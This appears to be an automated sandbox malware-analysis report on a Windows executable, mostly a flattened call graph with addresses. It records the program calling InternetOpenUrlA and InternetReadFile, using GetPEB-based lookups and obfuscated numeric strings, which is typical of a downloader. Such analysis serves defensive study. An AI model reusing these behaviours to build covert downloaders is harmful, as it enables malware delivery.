33189->33195 33405 14ade0 33190->33405 33193 1602fe Concurrency::cancel_current_task KiUserExceptionDispatcher 33194 14fa92 33193->33194 33196 14ac83 33195->33196 33197 14ac8c 33195->33197 33198 14be69 std::ios_base::_Init 39 API calls 33196->33198 33199 145f62 14 API calls 2 library calls 33197->33199 33198->33197 33199->33108 33201 15ca60 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 33200->33201 33202 17fc53 33201->33202 33202->33202 33204 14bbed 33203->33204 33208 14bb94 std::ios_base::_Init 33203->33208 33217 145cb5 41 API calls std::ios_base::_Init 33204->33217 33207 14bb9b _Yarn 33207->33120 33208->33207 33210 14fa93 33208->33210 33211 14faa0 33210->33211 33214 14faa9 33210->33214 33218 150873 33211->33218 33213 14fab5 33213->33207 33214->33213 33233 15cc6b 33214->33233 33215 14faa6 33215->33207 33219 150884 33218->33219 33220 145bbc Concurrency::cancel_current_task 33218->33220 33221 15cc6b std::_Facet_Register 41 API calls 33219->33221 33247 1602fe 33220->33247 33222 15088a 33221->33222 33223 150891 33222->33223 33224 15089c 33222->33224 33223->33215 33251 16b834 39 API calls _Fputc 33224->33251 33226 145bd8 33250 145c40 40 API calls Concurrency::cancel_current_task 33226->33250 33229 16b907 33252 16b915 11 API calls __purecall 33229->33252 33230 145c11 33230->33215 33232 16b914 33235 15cc70 33233->33235 33236 15cc8a 33235->33236 33238 15cc8c 33235->33238 33253 165bb8 33235->33253 33261 16bd82 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 33235->33261 33236->33215 33239 145bbc Concurrency::cancel_current_task 33238->33239 33241 15cc96 std::_Facet_Register 33238->33241 33240 1602fe Concurrency::cancel_current_task KiUserExceptionDispatcher 33239->33240 33242 145bd8 33240->33242 33243 1602fe Concurrency::cancel_current_task KiUserExceptionDispatcher 33241->33243 33260 145c40 40 API calls Concurrency::cancel_current_task 33242->33260 33245 15d1de 33243->33245 33246 145c11 33246->33215 33248 160345 KiUserExceptionDispatcher 33247->33248 33249 160318 33247->33249 33248->33226 33249->33248 33250->33230 33251->33229 33252->33232 33258 17188c __Getctype 33253->33258 33254 1718ca 33263 164eb3 14 API calls __Wcrtomb 33254->33263 33256 1718b5 RtlAllocateHeap 33257 1718c8 33256->33257 33256->33258 33257->33235 33258->33254 33258->33256 33262 16bd82 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 33258->33262 33260->33246 33261->33235 33262->33258 33263->33257 33265 14adc4 33264->33265 33267 14ad9a _Yarn 33264->33267 33276 14bdb4 41 API calls 2 library calls 33265->33276 33267->33129 33268->33128 33270 14a814 33269->33270 33271 14ad83 std::ios_base::_Init 41 API calls 33270->33271 33272 14a81d 33271->33272 33272->33135 33273->33140 33274->33139 33275->33150 33276->33267 33278 145f13 __EH_prolog3 33277->33278 33279 14a85f std::ios_base::_Init 41 API calls 33278->33279 33280 145f26 std::ios_base::_Init 33279->33280 33280->33157 33282 145fc5 __EH_prolog3 33281->33282 33329 145d26 33282->33329 33285 145d26 41 API calls 33286 145ff6 33285->33286 33335 14a756 33286->33335 33289 14ad83 std::ios_base::_Init 41 API calls 33290 14603b 33289->33290 33291 14a805 41 API calls 33290->33291 33292 146043 33291->33292 33293 14ad83 std::ios_base::_Init 41 API calls 33292->33293 33294 146051 33293->33294 33295 14a805 41 API calls 33294->33295 33296 146059 33295->33296 33297 14ac78 std::ios_base::_Init 39 API calls 33296->33297 33298 14607c 33297->33298 33299 14ac78 std::ios_base::_Init 39 API calls 33298->33299 33300 146088 std::ios_base::_Init 33299->33300 33300->33159 33302 145ebf __EH_prolog3 33301->33302 33347 145cc0 33302->33347 33306 145eed 33307 14ac78 std::ios_base::_Init 39 API calls 33306->33307 33308 145eff std::ios_base::_Init 33307->33308 33308->33163 33310 14e399 __EH_prolog3 33309->33310 33311 14a756 41 API calls 33310->33311 33312 14e3e8 33311->33312 33313 14a805 41 API calls 33312->33313 33314 14e3f3 33313->33314 33315 14a7e4 41 API calls 33314->33315 33316 14e400 33315->33316 33317 14a805 41 API calls 33316->33317 33318 14e40b 33317->33318 33319 14a7e4 41 API calls 33318->33319 33320 14e417 33319->33320 33321 14a805 41 API calls 33320->33321 33322 14e41f 33321->33322 33323 14a805 41 API calls 33322->33323 33324 14e427 std::ios_base::_Init 33323->33324 33324->33165 33326 145e78 __EH_prolog3 33325->33326 33376 145d86 33326->33376 33328 145ea5 std::ios_base::_Init 33328->33175 33330 145d32 __EH_prolog3_GS 33329->33330 33342 14e073 33330->33342 33333 17fc49 5 API calls 33334 145d7a 33333->33334 33334->33285 33336 14602d 33335->33336 33337 14a768 33335->33337 33336->33289 33337->33336 33338 14a76f 33337->33338 33340 14a783 _Yarn 33337->33340 33346 14baf1 41 API calls 2 library calls 33338->33346 33340->33336 33341 14be69 std::ios_base::_Init 39 API calls 33340->33341 33341->33336 33343 145d5a 33342->33343 33344 14e09d 33342->33344 33343->33333 33345 14bb7d std::ios_base::_Init 41 API calls 33344->33345 33345->33343 33346->33336 33348 145ccc __EH_prolog3_GS 33347->33348 33349 14e073 41 API calls 33348->33349 33350 145d05 33349->33350 33351 17fc49 5 API calls 33350->33351 33352 145d25 33351->33352 33353 14b324 33352->33353 33354 14b330 __EH_prolog3 33353->33354 33355 14a756 41 API calls 33354->33355 33356 14b374 33355->33356 33367 14a7e4 33356->33367 33359 14a805 41 API calls 33360 14b388 33359->33360 33371 14ac9e 33360->33371 33363 14a805 41 API calls 33364 14b39e 33363->33364 33365 14a7e4 41 API calls 33364->33365 33366 14b3aa std::ios_base::_Init 33365->33366 33366->33306 33368 14a7ee 33367->33368 33368->33368 33369 14ad83 std::ios_base::_Init 41 API calls 33368->33369 33370 14a800 33369->33370 33370->33359 33372 14acc5 33371->33372 33373 14acaa 33371->33373 33375 14bc57 41 API calls 2 library calls 33372->33375 33373->33363 33375->33373 33377 145d92 __EH_prolog3 33376->33377 33380 1458bc 33377->33380 33379 145d9f std::ios_base::_Init 33379->33328 33385 16006f 33380->33385 33383 15ca60 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 33384 145925 33383->33384 33384->33379 33386 16007c 33385->33386 33392 14590b 33385->33392 33387 165bb8 ___std_exception_copy 15 API calls 33386->33387 33386->33392 33388 160099 33387->33388 33389 1600a9 33388->33389 33396 164a96 39 API calls 2 library calls 33388->33396 33393 164f2e 33389->33393 33392->33383 33397 1702fe 33393->33397 33396->33389 33398 164f46 33397->33398 33399 170309 RtlFreeHeap 33397->33399 33398->33392 33399->33398 33400 17031e GetLastError 33399->33400 33401 17032b __dosmaperr 33400->33401 33403 164eb3 14 API calls __Wcrtomb 33401->33403 33403->33398 33404->33186 33408 14a930 33405->33408 33413 145930 33408->33413 33414 16006f ___std_exception_copy 40 API calls 33413->33414 33415 145972 33414->33415 33416 145dc0 33415->33416 33417 145930 Concurrency::cancel_current_task 40 API calls 33416->33417 33418 145df1 33417->33418 33418->33193 33419 15d012 33420 15d01e __FrameHandler3::FrameUnwindToState 33419->33420 33445 15cd11 33420->33445 33422 15d025 33423 15d17e 33422->33423 33433 15d04f ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock __purecall 33422->33433 33605 15d3d0 4 API calls 2 library calls 33423->33605 33425 15d185 33606 16c26b 21 API calls __purecall 33425->33606 33427 15d18b 33607 16c22f 21 API calls __purecall 33427->33607 33429 15d193 33430 15d06e 33431 15d0ef 33453 16ca57 33431->33453 33433->33430 33433->33431 33604 16c245 39 API calls 3 library calls 33433->33604 33435 15d0f5 33457 157be1 33435->33457 33446 15cd1a 33445->33446 33608 15d1df IsProcessorFeaturePresent 33446->33608 33448 15cd26 33609 16011c 10 API calls 2 library calls 33448->33609 33450 15cd2b 33451 15cd2f 33450->33451 33610 16013b 7 API calls 2 library calls 33450->33610 33451->33422 33454 16ca60 33453->33454 33455 16ca65 33453->33455 33611 16c58c 53 API calls 33454->33611 33455->33435 33458 157bf0 __EH_prolog3_GS 33457->33458 33612 157aaa 33458->33612 33462 157c0a 33463 14a85f std::ios_base::_Init 41 API calls 33462->33463 33464 157c26 33463->33464 33624 1461c0 33464->33624 33466 14a85f std::ios_base::_Init 41 API calls 33491 157e86 33466->33491 33467 1573cd 50 API calls 33540 157c47 33467->33540 33468 157f5e 33649 15b11a 33468->33649 33470 157f6e 33656 14a898 33470->33656 33476 157f9d 33668 14b558 33476->33668 33478 156884 41 API calls 33478->33540 33480 1586f4 39 API calls 33480->33540 33481 157fcb 33704 15840e 41 API calls 33481->33704 33483 157fda FindWindowA 33705 14b3e8 41 API calls 2 library calls 33483->33705 33485 157ffc 33706 14b3e8 41 API calls 2 library calls 33485->33706 33487 158007 33707 14b3e8 41 API calls 2 library calls 33487->33707 33489 14e073 41 API calls 33489->33491 33490 158020 33708 14a568 41 API calls 2 library calls 33490->33708 33491->33468 33491->33489 33493 1586f4 39 API calls 33491->33493 33679 14b4ba 41 API calls 2 library calls 33491->33679 33680 14b614 41 API calls 2 library calls 33491->33680 33681 1573cd 33491->33681 33493->33491 33494 157e63 33494->33466 33495 158028 33709 14b3e8 41 API calls 2 library calls 33495->33709 33496 14a85f std::ios_base::_Init 41 API calls 33496->33540 33498 158044 33710 14a568 41 API calls 2 library calls 33498->33710 33500 15804c 33711 155726 41 API calls 2 library calls 33500->33711 33503 15805c 33712 155040 94 API calls 4 library calls 33503->33712 33505 158064 33713 14a568 41 API calls 2 library calls 33505->33713 33507 15808f 33714 15ad7e 41 API calls 2 library calls 33507->33714 33509 1580a3 33510 158269 33509->33510 33715 14b3e8 41 API calls 2 library calls 33509->33715 33739 14a568 41 API calls 2 library calls 33510->33739 33513 14e073 41 API calls 33513->33540 33514 1580cf 33716 14a568 41 API calls 2 library calls 33514->33716 33515 15828a 33740 15ad7e 41 API calls 2 library calls 33515->33740 33518 1580d7 33717 15ad7e 41 API calls 2 library calls 33518->33717 33519 15829e 33520 1583a5 33519->33520 33741 14b3e8 41 API calls 2 library calls 33519->33741 33755 14a568 41 API calls 2 library calls 33520->33755 33524 1583c1 33756 15ad7e 41 API calls 2 library calls 33524->33756 33525 1582c5 33742 14a568 41 API calls 2 library calls 33525->33742 33528 157b46 41 API calls 33528->33540 33529 1580eb 33529->33510 33718 14b3e8 41 API calls 2 library calls 33529->33718 33530 1583d5 33534 158405 ExitProcess 33530->33534 33757 14b3e8 41 API calls 2 library calls 33530->33757 33531 1582cd 33743 15ad7e 41 API calls 2 library calls 33531->33743 33532 15b11a 44 API calls 33532->33540 33536 15810b 33719 14b3e8 41 API calls 2 library calls 33536->33719 33539 1583f0 33758 14a568 41 API calls 2 library calls 33539->33758 33540->33467 33540->33478 33540->33480 33540->33494 33540->33496 33540->33513 33540->33528 33540->33532 33678 1586bf 39 API calls 33540->33678 33541 158116 33720 14b3e8 41 API calls 2 library calls 33541->33720 33544 1583f8 33759 1576ce 57 API calls 3 library calls 33544->33759 33545 1582e1 33545->33520 33744 14b3e8 41 API calls 2 library calls 33545->33744 33546 158126 33721 14b3e8 41 API calls 2 library calls 33546->33721 33550 158301 33745 14b3e8 41 API calls 2 library calls 33550->33745 33551 158135 33722 14b3e8 41 API calls 2 library calls 33551->33722 33554 15830c 33746 14b3e8 41 API calls 2 library calls 33554->33746 33555 158152 33723 14a568 41 API calls 2 library calls 33555->33723 33558 158325 33747 14a568 41 API calls 2 library calls 33558->33747 33560 15815a 33724 14b3e8 41 API calls 2 library calls 33560->33724 33561 15832d 33748 14b3e8 41 API calls 2 library calls 33561->33748 33564 158176 33725 14a568 41 API calls 2 library calls 33564->33725 33565 158348 33749 14a568 41 API calls 2 library calls 33565->33749 33567 15817e 33726 14b3e8 41 API calls 2 library calls 33567->33726 33570 158350 33750 14b3e8 41 API calls 2 library calls 33570->33750 33571 15819d 33727 14a568 41 API calls 2 library calls 33571->33727 33574 15836c 33751 14a568 41 API calls 2 library calls 33574->33751 33575 1581a5 33728 14b3e8 41 API calls 2 library calls 33575->33728 33578 158374 33752 1597dc 48 API calls 2 library calls 33578->33752 33579 1581c4 33729 14a568 41 API calls 2 library calls 33579->33729 33582 158387 33753 15960c 109 API calls __EH_prolog3_GS 33582->33753 33583 1581cc 33730 14b3e8 41 API calls 2 library calls 33583->33730 33586 158396 33754 1585fd 41 API calls 33586->33754 33587 1581e8 33731 14a568 41 API calls 2 library calls 33587->33731 33590 1581f0 33732 14b3e8 41 API calls 2 library calls 33590->33732 33592 15820c 33733 14a568 41 API calls 2 library calls 33592->33733 33594 158214 33734 14b3e8 41 API calls 2 library calls 33594->33734 33596 158230 33735 14a568 41 API calls 2 library calls 33596->33735 33598 158238 33736 149fc4 48 API calls 2 library calls 33598->33736 33600 15824b 33737 149a90 149 API calls 2 library calls 33600->33737 33602 15825a 33738 1584e1 41 API calls 33602->33738 33604->33431 33605->33425 33606->33427 33607->33429 33608->33448 33609->33450 33610->33451 33611->33455 33613 157ab6 __EH_prolog3_GS 33612->33613 33760 15da56 33613->33760 33615 157ac8 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 33616 14e073 41 API calls 33615->33616 33617 157b15 33616->33617 33618 17fc49 5 API calls 33617->33618 33619 157b45 33618->33619 33620 1586f4 33619->33620 33621 158706 33620->33621 33622 1586ff 33620->33622 33621->33462 33623 14ac78 std::ios_base::_Init 39 API calls 33622->33623 33623->33621 33625 1461cc __EH_prolog3_GS 33624->33625 33626 14a898 std::ios_base::_Init 41 API calls 33625->33626 33627 1461d9 33626->33627 33768 15c2b7 33627->33768 33630 14a85f std::ios_base::_Init 41 API calls 33631 1461fc 33630->33631 33780 15c0f0 33631->33780 33634 14a85f std::ios_base::_Init 41 API calls 33635 14622e 33634->33635 33636 15c0f0 44 API calls 33635->33636 33637 14623b 33636->33637 33638 14a85f std::ios_base::_Init 41 API calls 33637->33638 33639 146250 33638->33639 33640 15c0f0 44 API calls 33639->33640 33641 14625d 33640->33641 33642 14a85f std::ios_base::_Init 41 API calls 33641->33642 33643 146272 33642->33643 33644 15c0f0 44 API calls 33643->33644 33645 14627f InternetOpenA 33644->33645 33647 17fc49 5 API calls 33645->33647 33648 1462ad 33647->33648 33648->33540 33654 15b126 __EH_prolog3 33649->33654 33650 15b2a0 std::ios_base::_Init 33650->33470 33652 15b243 33652->33650 33653 14ac9e 41 API calls 33652->33653 33653->33652 33654->33650 33654->33652 33655 14ac9e 41 API calls 33654->33655 33808 16b9f0 42 API calls 2 library calls 33654->33808 33655->33654 33657 14a8bb 33656->33657 33809 14bbf3 33657->33809 33659 14a8c6 33660 15b2ab 33659->33660 33661 15b2b7 __EH_prolog3 33660->33661 33662 14a85f std::ios_base::_Init 41 API calls 33661->33662 33663 15b2e4 33662->33663 33664 15b31f 33663->33664 33665 14ac9e 41 API calls 33663->33665 33666 14ac78 std::ios_base::_Init 39 API calls 33664->33666 33665->33663 33667 15b32b std::ios_base::_Init 33666->33667 33667->33476 33669 14b567 __EH_prolog3 33668->33669 33817 14b07f 33669->33817 33671 14b598 33840 14e0d4 33671->33840 33673 14b5de 33846 14c1b8 33673->33846 33677 14b600 std::ios_base::_Init _Func_class 33677->33481 33678->33540 33679->33491 33680->33491 33682 1573e8 ___scrt_uninitialize_crt 33681->33682 33683 15c2b7 47 API calls 33682->33683 33684 15742e 33683->33684 33685 14a85f std::ios_base::_Init 41 API calls 33684->33685 33686 157445 33685->33686 33687 15c0f0 44 API calls 33686->33687 33688 157456 33687->33688 33689 14a85f std::ios_base::_Init 41 API calls 33688->33689 33690 15747e 33689->33690 33691 15c0f0 44 API calls 33690->33691 33692 15748f 33691->33692 33693 14a85f std::ios_base::_Init 41 API calls 33692->33693 33694 1574a7 33693->33694 33695 15c0f0 44 API calls 33694->33695 33696 1574b8 InternetOpenUrlA 33695->33696 33698 1575d1 33696->33698 33700 157571 33696->33700 33701 15ca60 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 33698->33701 33699 157590 InternetReadFile 33699->33698 33699->33700 33700->33698 33700->33699 34028 157870 33700->34028 33703 1575ff 33701->33703 33703->33491 33704->33483 33705->33485 33706->33487 33707->33490 33708->33495 33709->33498 33710->33500 33711->33503 33712->33505 33713->33507 33714->33509 33715->33514 33716->33518 33717->33529 33718->33536 33719->33541 33720->33546 33721->33551 33722->33555 33723->33560 33724->33564 33725->33567 33726->33571 33727->33575 33728->33579 33729->33583 33730->33587 33731->33590 33732->33592 33733->33594 33734->33596 33735->33598 33736->33600 33737->33602 33738->33510 33739->33515 33740->33519 33741->33525 33742->33531 33743->33545 33744->33550 33745->33554 33746->33558 33747->33561 33748->33565 33749->33570 33750->33574 33751->33578 33752->33582 33753->33586 33754->33520 33755->33524 33756->33530 33757->33539 33758->33544 33759->33534 33763 15f815 33760->33763 33764 15f845 GetSystemTimePreciseAsFileTime 33763->33764 33765 15f851 GetSystemTimeAsFileTime 33763->33765 33766 15da64 33764->33766 33765->33766 33766->33615 33799 17fc9a 33768->33799 33770 15c2c6 GetPEB 33776 15c2e5 __fread_nolock 33770->33776 33779 15c3c5 33770->33779 33771 17fc49 5 API calls 33772 1461e8 33771->33772 33772->33630 33774 164a96 39 API calls ___std_exception_copy 33774->33776 33775 16bd0a 43 API calls 33775->33776 33776->33774 33776->33775 33777 14a85f 41 API calls std::ios_base::_Init 33776->33777 33778 14ac78 39 API calls std::ios_base::_Init 33776->33778 33776->33779 33800 15c272 WideCharToMultiByte 33776->33800 33777->33776 33778->33776 33779->33771 33781 15c0fc __EH_prolog3_catch_GS 33780->33781 33782 15c107 33781->33782 33797 15c11a 33781->33797 33783 14ac78 std::ios_base::_Init 39 API calls 33782->33783 33784 15c113 33783->33784 33801 17fc58 33784->33801 33785 15c210 33787 14ac78 std::ios_base::_Init 39 API calls 33785->33787 33787->33784 33790 146209 33790->33634 33791 15c25d 33806 15d9ca 41 API calls 2 library calls 33791->33806 33792 15c267 33807 15da0a 41 API calls 2 library calls 33792->33807 33795 14a85f std::ios_base::_Init 41 API calls 33795->33797 33797->33785 33797->33791 33797->33792 33797->33795 33798 14ac78 std::ios_base::_Init 39 API calls 33797->33798 33804 164eb3 14 API calls __Wcrtomb 33797->33804 33805 169b67 42 API calls _Fputc 33797->33805 33798->33797 33799->33770 33800->33776 33802 15ca60 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 33801->33802 33803 17fc62 33802->33803 33803->33803 33804->33797 33805->33797 33808->33654 33810 14bc51 33809->33810 33813 14bc07 std::ios_base::_Init 33809->33813 33816 145cb5 41 API calls std::ios_base::_Init 33810->33816 33814 14fa93 std::ios_base::_Init 41 API calls 33813->33814 33815 14bc0e _Yarn 33813->33815 33814->33815 33815->33659 33818 14b08b __EH_prolog3_GS 33817->33818 33819 14b18c 33818->33819 33820 14b0b4 33818->33820 33821 14b0a3 33818->33821 33822 14b0e3 33818->33822 33823 14b11e 33818->33823 33837 14b0a8 33818->33837 33824 14b197 33819->33824 33819->33837 33829 15cc6b std::_Facet_Register 41 API calls 33820->33829 33913 14b8d3 41 API calls 2 library calls 33821->33913 33825 15cc6b std::_Facet_Register 41 API calls 33822->33825 33826 15cc6b std::_Facet_Register 41 API calls 33823->33826 33830 14a85f std::ios_base::_Init 41 API calls 33824->33830 33831 14b0f2 33825->33831 33826->33837 33828 17fc49 5 API calls 33832 14b0b1 33828->33832 33829->33837 33833 14b1a4 33830->33833 33834 14a85f std::ios_base::_Init 41 API calls 33831->33834 33832->33671 33914 14bedb 41 API calls 2 library calls 33833->33914 33834->33837 33836 14b1b8 33838 1602fe Concurrency::cancel_current_task KiUserExceptionDispatcher 33836->33838 33837->33828 33839 14b1c8 33838->33839 33842 14e0e0 __EH_prolog3 _Func_class 33840->33842 33915 150264 33842->33915 33845 14e175 std::ios_base::_Init _Func_class 33845->33673 33847 14c1c7 __EH_prolog3_GS 33846->33847 33848 14c367 33847->33848 33852 14c1da __fread_nolock 33847->33852 33995 14f10f 33848->33995 33850 14c3a2 33851 14ce70 44 API calls 33850->33851 33853 14c3ac 33851->33853 34019 14caf1 41 API calls 3 library calls 33852->34019 33855 14a85f std::ios_base::_Init 41 API calls 33853->33855 33905 14c469 33853->33905 33859 14c3c8 33855->33859 33856 14c217 34020 14e5d5 46 API calls 2 library calls 33856->34020 33857 14c49f 33858 14c362 33857->33858 33863 14be69 std::ios_base::_Init 39 API calls 33857->33863 33864 17fc49 5 API calls 33858->33864 33865 14cba6 46 API calls 33859->33865 33860 14b07f 41 API calls 33866 14c490 33860->33866 33862 14c22c 33867 14ce70 44 API calls 33862->33867 33863->33858 33868 14b5f1 33864->33868 33869 14c3e3 33865->33869 34026 14a4fa 41 API calls 33866->34026 33871 14c23c 33867->33871 33912 14c0c7 39 API calls _Func_class 33868->33912 33872 14efdd 41 API calls 33869->33872 33873 14c2f7 33871->33873 33875 14a85f std::ios_base::_Init 41 API calls 33871->33875 33874 14c407 33872->33874 33876 14c321 33873->33876 33877 14c2fd 33873->33877 33878 14cce6 46 API calls 33874->33878 33879 14c255 33875->33879 33881 14c353 33876->33881 33887 14b07f 41 API calls 33876->33887 33880 14b07f 41 API calls 33877->33880 33882 14c41e 33878->33882 33885 14cba6 46 API calls 33879->33885 33886 14c31b 33880->33886 34024 14c9f1 41 API calls _Func_class 33881->34024 33884 14fa63 41 API calls 33882->33884 33888 14c42d 33884->33888 33889 14c26d 33885->33889 34023 14a4fa 41 API calls 33886->34023 33887->33886 33890 14ac78 std::ios_base::_Init 39 API calls 33888->33890 33891 14efdd 41 API calls 33889->33891 33893 14c43c 33890->33893 33894 14c291 33891->33894 34025 145f62 14 API calls 2 library calls 33893->34025 33896 14cce6 46 API calls 33894->33896 33898 14c2ac 33896->33898 33897 14c44b 33899 14ac78 std::ios_base::_Init 39 API calls 33897->33899 34021 14f0df 41 API calls Concurrency::cancel_current_task 33898->34021 33901 14c45a 33899->33901 33903 14ac78 std::ios_base::_Init 39 API calls 33901->33903 33902 14c2be 33904 14ac78 std::ios_base::_Init 39 API calls 33902->33904 33903->33905 33906 14c2cd 33904->33906 33905->33857 33905->33860 34022 145f62 14 API calls 2 library calls 33906->34022 33908 14c2dc 33909 14ac78 std::ios_base::_Init 39 API calls 33908->33909 33910 14c2eb 33909->33910 33911 14ac78 std::ios_base::_Init 39 API calls 33910->33911 33911->33873 33912->33677 33913->33837 33914->33836 33941 169bf9 33915->33941 33918 14ce70 33919 14ceaa 33918->33919 33920 14ce89 33918->33920 33926 14ceb1 33919->33926 33932 14cee3 33919->33932 33991 14dc05 41 API calls 33919->33991 33988 14dc05 41 API calls 33920->33988 33923 14ce8e 33923->33919 33989 14dc05 41 API calls 33923->33989 33925 14ce9c 33925->33926 33990 14dc05 41 API calls 33925->33990 33928 15ca60 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 33926->33928 33930 14d08d 33928->33930 33929 14cf4a 33931 14cfea 33929->33931 33935 14cf53 33929->33935 33930->33845 33933 14cf69 33931->33933 33936 14d01e 33931->33936 33932->33926 33932->33929 33938 14dc05 41 API calls 33932->33938 33933->33926 33992 14d270 44 API calls 2 library calls 33933->33992 33935->33926 33935->33933 33939 14cfc1 33935->33939 33936->33926 33994 14d235 41 API calls 33936->33994 33938->33932 33993 14d5be 41 API calls 33939->33993 33946 1713a9 GetLastError 33941->33946 33947 1713bf 33946->33947 33948 1713c5 33946->33948 33979 172028 6 API calls __Getctype 33947->33979 33952 1713c9 33948->33952 33980 172067 6 API calls __Getctype 33948->33980 33951 1713e1 33951->33952 33953 1713e9 33951->33953 33954 17144e SetLastError 33952->33954 33981 1702a1 14 API calls 3 library calls 33953->33981 33957 17145e 33954->33957 33958 169c04 33954->33958 33956 1713f6 33959 17140f 33956->33959 33960 1713fe 33956->33960 33986 16fac6 39 API calls __purecall 33957->33986 33975 172316 33958->33975 33983 172067 6 API calls __Getctype 33959->33983 33982 172067 6 API calls __Getctype 33960->33982 33965 17140c 33971 1702fe ___free_lconv_mon 14 API calls 33965->33971 33966 17141b 33967 171436 33966->33967 33968 17141f 33966->33968 33985 1711d7 14 API calls __Wcrtomb 33967->33985 33984 172067 6 API calls __Getctype 33968->33984 33973 171433 33971->33973 33972 171441 33974 1702fe ___free_lconv_mon 14 API calls 33972->33974 33973->33954 33974->33973 33976 172329 33975->33976 33978 14e160 33975->33978 33976->33978 33987 178421 39 API calls 4 library calls 33976->33987 33978->33918 33979->33948 33980->33951 33981->33956 33982->33965 33983->33966 33984->33965 33985->33972 33987->33978 33988->33923 33989->33925 33990->33919 33991->33919 33992->33926 33993->33926 33994->33926 33996 14f11e __EH_prolog3_GS 33995->33996 33997 14a85f std::ios_base::_Init 41 API calls 33996->33997 33998 14f93d 33997->33998 33999 14cba6 46 API calls 33998->33999 34000 14f955 33999->34000 34001 14efdd 41 API calls 34000->34001 34002 14f973 34001->34002 34003 14cce6 46 API calls 34002->34003 34004 14f988 34003->34004 34005 14fa63 41 API calls 34004->34005 34006 14f996 34005->34006 34007 14ac78 std::ios_base::_Init 39 API calls 34006->34007 34008 14f9a4 34007->34008 34027 145f62 14 API calls 2 library calls 34008->34027 34010 14f9b3 34011 14ac78 std::ios_base::_Init 39 API calls 34010->34011 34012 14f9c2 34011->34012 34013 14ac78 std::ios_base::_Init 39 API calls 34012->34013 34014 14f9ce 34013->34014 34015 14f9e8 34014->34015 34016 14be69 std::ios_base::_Init 39 API calls 34014->34016 34017 17fc49 5 API calls 34015->34017 34016->34015 34018 14f9fc 34017->34018 34018->33850 34019->33856 34020->33862 34021->33902 34022->33908 34023->33881 34024->33858 34025->33897 34026->33857 34027->34010 34029 15787c __EH_prolog3_catch 34028->34029 34030 157985 _Yarn std::ios_base::_Init 34029->34030 34031 1578d9 34029->34031 34032 157a6a 34029->34032 34030->33700 34034 14fa93 std::ios_base::_Init 41 API calls 34031->34034 34043 14b2c0 41 API calls std::ios_base::_Init 34032->34043 34040 157910 _Yarn 34034->34040 34042 1500c0 39 API calls std::ios_base::_Init 34040->34042 34042->34030

                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                Function 001573CD Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 167networkfileCOMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 0015C2B7: __EH_prolog3_GS.LIBCMT ref: 0015C2C1
                                                                                                                                                                                                  • Part of subcall function 0015C0F0: __EH_prolog3_catch_GS.LIBCMT ref: 0015C0F7
                                                                                                                                                                                                • InternetOpenUrlA.WININET ref: 0015753F
                                                                                                                                                                                                • InternetReadFile.WININET ref: 00157590
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Internet$FileH_prolog3_H_prolog3_catch_OpenRead
                                                                                                                                                                                                • String ID: 789593363246702628$8045878863314484420$9351356959942806932$Kernel32.dll$Wininet.dll
                                                                                                                                                                                                • API String ID: 3547353422-2454429382
                                                                                                                                                                                                • Opcode ID: 2d9fd9e3ea465b77081bb94459d31e1e57abeff86f080d94bd49b6dc3f9bfa49
                                                                                                                                                                                                • Instruction ID: a23e886e3bdc1fd4cc0660365a77cfeab2ccff68398068f79be80f0631cba9c1
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2d9fd9e3ea465b77081bb94459d31e1e57abeff86f080d94bd49b6dc3f9bfa49
                                                                                                                                                                                                • Instruction Fuzzy Hash: DE514E70A00258EFDB20DF14CD49B9DBBB9FB08711F0040A9F949A7291D7B49E84CFA1
                                                                                                                                                                                                Function 00157BE1 Relevance: 30.3, APIs: 3, Strings: 14, Instructions: 563COMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
